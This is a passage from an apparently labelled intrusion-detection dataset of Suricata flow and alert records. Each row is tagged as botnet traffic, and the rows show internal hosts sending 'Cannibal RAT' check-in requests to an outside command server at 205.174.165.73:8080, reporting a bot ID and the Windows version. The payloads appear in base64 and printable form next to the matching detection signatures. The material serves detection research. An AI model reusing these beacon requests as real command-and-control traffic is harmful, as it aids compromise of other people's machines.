'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:18.129538+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPfBAAIAGfzbAqAoJza6lSQq6H5CwVtcNx9jdGFARAQAaigAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:18.221462+0000', 'flow_id': 1618947324967426, 'pcap_cnt': 4508544, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2746, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:18.129538+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPfBAAIAGfzbAqAoJza6lSQq6H5CwVtcNx9jdGFARAQAaigAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,354 |
192.168.10.14-51606-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4509553, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:20 | 74,317 | Friday | [{'timestamp': '2017-07-07T13:27:20.963048+0000', 'flow_id': 935643798082226, 'pcap_cnt': 4509553, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51606, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:20.889522+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGWNAAIAGo77AqAoOza6lScmWH5DFO4Q8Qb1fElARAQCdtgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:20.963048+0000', 'flow_id': 935643798082226, 'pcap_cnt': 4509553, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51606, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:20.889522+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGWNAAIAGo77AqAoOza6lScmWH5DFO4Q8Qb1fElARAQCdtgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,362 |
192.168.10.15-52277-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4510984, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:22 | 78,517 | Friday | [{'timestamp': '2017-07-07T13:27:22.538460+0000', 'flow_id': 1398405049485229, 'pcap_cnt': 4510984, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52277, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:22.460717+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobzNAAIAGTe3AqAoPza6lScw1H5Cybj9aYLVsuFARAQDGJwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:22.538460+0000', 'flow_id': 1398405049485229, 'pcap_cnt': 4510984, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52277, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:22.460717+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobzNAAIAGTe3AqAoPza6lScw1H5Cybj9aYLVsuFARAQDGJwAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 308 | attack | 1,250,420 |
192.168.10.9-2747-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4512499, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:28 | 76,071 | Friday | [{'timestamp': '2017-07-07T13:27:28.313370+0000', 'flow_id': 586733540385396, 'pcap_cnt': 4512499, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2747, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:28.238196+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPfhAAIAGfy7AqAoJza6lSQq7H5Dh8/WxyB2kdFARAQACpwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:28.313370+0000', 'flow_id': 586733540385396, 'pcap_cnt': 4512499, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2747, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:28.238196+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPfhAAIAGfy7AqAoJza6lSQq7H5Dh8/WxyB2kdFARAQACpwAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,507 |
192.168.10.14-51607-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4512693, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:30 | 65,393 | Friday | [{'timestamp': '2017-07-07T13:27:31.029844+0000', 'flow_id': 943782761773699, 'pcap_cnt': 4512693, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51607, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:30.965251+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGWhAAIAGo7nAqAoOza6lScmXH5CKAYSgoaiHlFARAQBQHgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:31.029844+0000', 'flow_id': 943782761773699, 'pcap_cnt': 4512693, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51607, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:30.965251+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGWhAAIAGo7nAqAoOza6lScmXH5CKAYSgoaiHlFARAQBQHgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,512 |
192.168.10.15-52308-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4512804, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:32 | 64,204 | Friday | [{'timestamp': '2017-07-07T13:27:32.604672+0000', 'flow_id': 585694158537272, 'pcap_cnt': 4512804, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52308, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:32.541240+0000'}, 'payload': 